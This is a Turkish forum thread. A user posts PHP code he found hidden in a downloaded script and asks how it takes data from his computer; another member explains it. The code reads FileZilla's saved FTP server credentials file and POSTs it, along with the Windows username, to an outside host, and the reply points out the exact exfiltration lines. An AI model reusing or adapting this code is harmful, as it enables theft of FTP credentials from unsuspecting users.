0
Kayıt Ol

CURL ile veri çekme

3

172

  • 02-04-2020, 19:44:07
    #1
    RedBytes
    RedBytes
    Üyeliği durduruldu
    <?php
$pat = @exec("echo %username%");
$code = ("hacklink_code");
$rizy = base64_decode("C:/Users/");
$fizy = $pat;
$rizy_2 = base64_decode("/AppData/Roaming/FileZilla/recentservers.xml");
$linked = ("".$rizy."".$fizy."".$rizy_2."");
$hacklink = fopen($linked, 'r');
$read = fread($hacklink, filesize($linked));

$ch2 = curl_init(base64_decode("https://webconfig.danwin1210.me/hacklink.php?read"));
curl_setopt ($ch2, CURLOPT_POST, true);
curl_setopt ($ch2, CURLOPT_POSTFIELDS, "f=".$read."&m=".$pat."");
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch2, CURLOPT_VERBOSE, 1);
curl_setopt($ch2, CURLOPT_NOBODY, 0);
$hacklink_parsed = curl_exec($ch2);
curl_close($ch2);
?>
    Böyle bir dosya buldum indirdiğim scriptin içinde. Bir türlü çözemedim
    $ch2 = curl_init(base64_decode("https://webconfig.danwin1210.me/hacklink.php?read"));
    alanında nasıl bir kod var ki bilgisayardan verileri çekiyor ?
  • 02-04-2020, 20:06:51
    #2
    Misafir
    Misafir
    Şöyle anlatayım. Eğer bilgisayarınızda FileZilla FTP programı varsa, oraya kaydettiğin FTP bilgilerini çekip, kendi adreslerine post ediyorlar.
    w.a.r.e.z. in sıkıntısı bu işte
  • 02-04-2020, 20:10:17
    #3
    RedBytes
    RedBytes
    Üyeliği durduruldu
    Misafir adlı üyeden alıntı: mesajı görüntüle
    Şöyle anlatayım. Eğer bilgisayarınızda FileZilla FTP programı varsa, oraya kaydettiğin FTP bilgilerini çekip, kendi adreslerine post ediyorlar.
    w.a.r.e.z. in sıkıntısı bu işte
    hocam onu anladım nasıl post ettiğini çözmeye çalışıyorum curl ile bi kaç işlem yaptım fakat akıl erdiremedim bu yönteme
  • 02-04-2020, 20:14:37
    #4
    Misafir
    Misafir
    RedBytes adlı üyeden alıntı: mesajı görüntüle
    hocam onu anladım nasıl post ettiğini çözmeye çalışıyorum curl ile bi kaç işlem yaptım fakat akıl erdiremedim bu yönteme 
    $ch2 = curl_init(base64_decode("https://webconfig.danwin1210.me/hacklink.php?read")); 
curl_setopt ($ch2, CURLOPT_POST, true); 
curl_setopt ($ch2, CURLOPT_POSTFIELDS, "f=".$read."&m=".$pat."");
    Post işlemi burada hocam. Gerisini zaten post giden url de hallediyorlar.
    • RedBytes
    RedBytes bunu beğendi.
    1 kişi bunu beğendi.